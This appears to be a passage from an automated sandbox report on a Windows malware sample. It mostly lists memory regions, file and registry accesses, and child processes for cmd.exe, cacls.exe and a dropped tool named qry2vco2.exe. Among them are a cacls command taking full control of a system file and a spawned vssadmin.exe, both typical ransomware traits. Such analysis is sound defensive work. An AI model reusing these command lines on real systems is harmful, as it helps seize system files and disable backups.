| private_0x0000000000f10000 | 0x00f10000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00f50000 | 0x00f51fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f80000 | 0x0103dfff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x051bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x0508ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x051bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051c0000 | 0x051c0000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052c0000 | 0x055f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f810000 | 0x7f810000 | 0x7f90ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f910000 | 0x7f910000 | 0x7f932fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f934000 | 0x7f934000 | 0x7f936fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f937000 | 0x7f937000 | 0x7f937fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f93a000 | 0x7f93a000 | 0x7f93cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f93d000 | 0x7f93d000 | 0x7f93dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #121: cmd.exe
86
0
| Information | Value |
|---|---|
| ID | #121 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvaXf73S.bat" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:29, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:33 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3a4 |
| Parent PID | 0x324 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6FC
0x
F9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000009988de0000 | 0x9988de0000 | 0x9988dfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009988de0000 | 0x9988de0000 | 0x9988deffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000009988df0000 | 0x9988df0000 | 0x9988df6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009988e00000 | 0x9988e00000 | 0x9988e13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009988e20000 | 0x9988e20000 | 0x9988f1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009988f20000 | 0x9988f20000 | 0x9988f23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000009988f30000 | 0x9988f30000 | 0x9988f30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009988f40000 | 0x9988f40000 | 0x9988f41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009988f50000 | 0x9988f50000 | 0x9988f56fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009988f60000 | 0x9988f60000 | 0x9988f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009988fe0000 | 0x9988fe0000 | 0x99890dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x99890e0000 | 0x998919dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000099891a0000 | 0x99891a0000 | 0x998929ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000099892a0000 | 0x99892a0000 | 0x99893effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x99893f0000 | 0x9989726fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff0f0000 | 0x7df5ff0f0000 | 0x7ff5ff0effff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff77e130000 | 0x7ff77e130000 | 0x7ff77e22ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff77e230000 | 0x7ff77e230000 | 0x7ff77e252fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff77e254000 | 0x7ff77e254000 | 0x7ff77e254fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff77e25c000 | 0x7ff77e25c000 | 0x7ff77e25dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff77e25e000 | 0x7ff77e25e000 | 0x7ff77e25ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x7ff77e410000 | 0x7ff77e468fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x7ffc505c0000 | 0x7ffc505c9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (39)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvaXf73S.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
18 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 272 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 8 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\vssadmin.exe | os_pid = 0xa7c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff77e410000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc55800000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ffc5581d550 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ffc558225e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ffc55821f90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ffc55093a10 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #123: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #123 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfc |
| Parent PID | 0xc54 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7A8
0x
950
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000005e0000 | 0x005e0000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x005effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x00601fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x00603fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00623fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00730000 | 0x00731fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00840000 | 0x008fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x009effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009f0000 | 0x00d26fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e200000 | 0x7e200000 | 0x7e2fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e300000 | 0x7e300000 | 0x7e322fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e326000 | 0x7e326000 | 0x7e328fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e329000 | 0x7e329000 | 0x7e32bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e32c000 | 0x7e32c000 | 0x7e32cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e32e000 | 0x7e32e000 | 0x7e32efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #124: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #124 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4f4 |
| Parent PID | 0xb70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
91C
0x
F5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00857fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x01deffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01f0ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
